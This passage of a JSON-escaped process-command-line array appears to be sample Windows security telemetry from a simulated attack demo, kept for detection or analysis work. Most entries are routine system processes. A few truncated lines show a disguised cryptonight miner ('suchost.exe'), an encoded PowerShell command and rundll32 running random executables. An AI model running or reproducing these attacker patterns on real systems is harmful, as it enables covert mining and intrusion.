-Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"cmdline unknown\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmdline unknown\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd  /c echo Begin Security Demo tasks\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; ianhelle@microsof...\",\".\\\\suchost.exe   -a cryptonight -o bcn -u bond007.0...\",\".\\\\powershell  -Noninteractive -Noprofile -Command ...\",\".\\\\powershell  -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2Z...\",\"cmd  /c echo End Security Demo tasks\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\speech_onecore\\\\common\\\\SpeechMo...\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 8 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -10918 /...\",\"ping  127.0.0.1 -n 17 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 0 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6735 ...\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32  \\\\26415\\\\9105.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 14 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17484...\",\"ping  127.0.0.1 -n 14 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 14 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 14 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 14 \",\"rundll32  \\\\15840\\\\26443.exe\",\"ping  127.0.0.1 -n 14 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 14 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 14 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 14 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 18 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 28 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 17 \",\"rundll32  \\\\18091\\\\18975.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 26 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1926 ...\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10353...\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32  \\\\29395\\\\14699.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 26 \",\"rundll32  \\\\24535\\\\23154.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 26 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29592...\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 26 \",\"rundll32  \\\\12420\\\\28156.exe\",\"ping  127.0.0.1 -n 26 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 26 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 26 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping  127.0.0.1 -n 26 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 29 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 8 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 19 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 6 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -14404 /...\",\"ping  127.0.0.1 -n 25 \",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 8 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -23146 /...\",\"ping  127.0.0.1 -n 9 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 3 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20009...\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32  \\\\6038\\\\18193.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 11 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 29 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 20 \",\"ping  127.0.0.1 -n 22 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 2 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 2 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\AppHostRegistrationVerifier.ex...\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe StartScan\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"ping  127.0.0.1 -n 11 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -29451 /...\",\"ping  127.0.0.1 -n 18 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 19 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd  /c echo Any questions about the commands exec...\",\"cmd  /c echo timb@microsoft.com; romead@microsoft....\",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32357...\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32  \\\\557\\\\12356.exe\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping  127.0.0.1 -n 14 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 16 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 26 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 12 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping  127.0.0.1 -n 6 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\28294\\\\1236.exe\",\"ping  127.0.0.1 -n 24 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd 